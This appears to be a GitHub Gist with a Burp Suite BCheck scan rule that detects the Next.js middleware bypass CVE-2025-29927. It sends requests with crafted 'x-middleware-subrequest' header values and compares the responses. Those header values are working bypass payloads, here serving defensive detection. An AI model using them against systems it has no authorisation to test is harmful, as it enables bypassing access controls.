-
-
Save and0x00/38fd282e67b521a4c2f35ead11c91fa7 to your computer and use it in GitHub Desktop.
Burp BCheck for CVE-2025-29927 (Next.js middleware bypass)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| metadata: | |
| language: v2-beta | |
| name: "CVE-2025-29927 - Next.js middleware bypass" | |
| description: "Checks for differences in responses when using different x-middleware-subrequest header paths" | |
| author: "Chris Grieger - blueredix.com" | |
| tags: "next.js", "middleware" | |
| run for each: | |
| middleware_value = "pages/_middleware", | |
| "middleware", | |
| "src/middleware", | |
| "middleware:middleware:middleware:middleware:middleware", | |
| "src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" | |
| given request then | |
| send request called check: | |
| headers: | |
| "x-middleware-subrequest": {middleware_value} | |
| if not({base.response.status_code} is {check.response.status_code}) or | |
| {base.response} differs from {check.response} | |
| then | |
| report issue: | |
| severity: high | |
| confidence: firm | |
| detail: "Different response detected when using a specific value for the in x-middleware-subrequest header." | |
| remediation: "The application responds differently when sending a request with the x-middleware-subrequest header. This could potentially be used to bypass middleware protections." | |
| end if |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment